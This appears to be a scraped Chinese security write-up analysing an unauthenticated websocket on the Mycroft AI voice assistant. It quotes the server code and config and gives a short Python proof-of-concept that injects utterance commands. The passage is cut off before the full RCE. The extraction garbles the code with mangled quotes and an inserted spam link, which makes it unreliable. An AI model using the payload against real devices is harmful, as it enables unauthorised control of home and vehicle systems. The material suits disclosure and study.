智能语音应用Mycroft AI的远程代码执行漏洞分析
4页1、智能语音应用智能语音应用 MycroftMycroft AIAI 的远程代码执行漏洞分析的远程代码执行漏洞分析智能语音应用 Mycroft AI 的远程代码执行漏洞分析。在 Arch Linux 社区开源软件包的开发贡献过程中,发现了一个很有意思的项目-麦考夫 Mycroft AI,它是一款开源且基于人工智能(AI)的语音助理应用,在对它的研究过程中,我发现了一个不用点击交互即可实现的远程代码执行漏洞(RCE)。与业界有名的 Amazon Echo 和 Google Home 不同的是,Mycroft 最早于 2015 年开始在海外网站发起众筹来批量生产其 Mark-I 和 Mark-II 代产品,而 3 月份其 Mark-II 代产品上线 4 天后就被售罄脱销。Mycroft AI 智能语音助理基于 Linux Desktop/Server 和Raspberry PI 架构,现广泛用于智能自动化家居系统中,其新款应用将订制化应用于捷豹和路虎的某些车型中。代码分析在对 Mycroft AI 的源代码分析中,我发现了其中有意思的一个地方:.host = config.get(“host“
2、)port = config.get(“port“)route = config.get(“route“)validate_param(host, “websocket.host“)validate_param(port, “websocket.port“)validate_param(route, “websocket.route“)routes = (route, WebsocketEventHandler)application = web.Application(routes, *settings)application.listen(port, host)ioloop.IOLoop.instance().start().在这里它定义了一个 websocket 服务端,用来接收类似于 Andriod 远程客户端的指令,在 mycroft.conf 中给出了 websocket 服务端设置的具体定义:/ The mycroft-core messagebus websocket“websocket“: “host“: “0.0.0.0“,“port“: 8181,“route“:
3、 “/core“,“ssl“: false,从以上代码可知,在 0.0.0.0:8181/core 上默认的 websocket 服务端竟然无需任何身份验证,好吧,让我们写个脚本来测试一下:捕鱼游戏 http:/#!/usr/bin/env pythonimport asyncioimport websocketsuri = “ws:/myserver:8181/core“command = “say pwned“async def sendPayload():async with websockets.connect(uri) as websocket:await websocket.send(“data“: “utterances“: “+command+“,“type“: “recognizer_loop:utterance“, “context“: null“)asyncio.get_event_loop().run_until_complete(sendPayload()很好,我们能让 Mycroft AI 自己说 “pwned”,这样,我们也能让 Mycroft AI 远程
《智能语音应用Mycroft AI的远程代码执行漏洞分析》由会员m****分享,可在线阅读,更多相关《智能语音应用Mycroft AI的远程代码执行漏洞分析》请在金锄头文库上搜索。
DB2发生死锁情况时应该怎么处理
Python 为何能成最强编程语言
面试前必须要知道的Redis面试
MySQL下自动删除指定时间以前的记录的操作方法
深入理解FastCGI协议以及在PHP中的实现
MySQL数据库性能优化之硬件瓶颈分析
NoSQL数据库大全收集整理
2018 – 2019 年前端 JavaScript 面试题
PHP文件包含漏洞的形式总结
5种使用Python代码轻松实现数据可视化的方法
改进JavaScript和Bust的互操作性:深入认识wasm-bindgen组件
C#图片缩放平移从功能分析到编码实现
详解网络蜘蛛的安全隐患及预防方法
利用NAP解除安全隐患自动隐藏你的IP地址
解决分布式数据库和离线网络中原子性问题的新方法
bbed恢复数据遇到延迟块清除的问题
Oracle Data Redaction数据加密
linux下du和df结果不一致的原因及处理
基于QMP实现对qemu虚拟机进行交互
解读Java并发队列BlockingQueue
2022-09-14 8页
2022-11-22 134页
2023-07-19 4页
2022-09-05 42页
2022-10-24 26页
2022-10-07 10页
2023-07-16 4页
2023-03-26 5页
2022-11-08 95页
2023-05-03 40页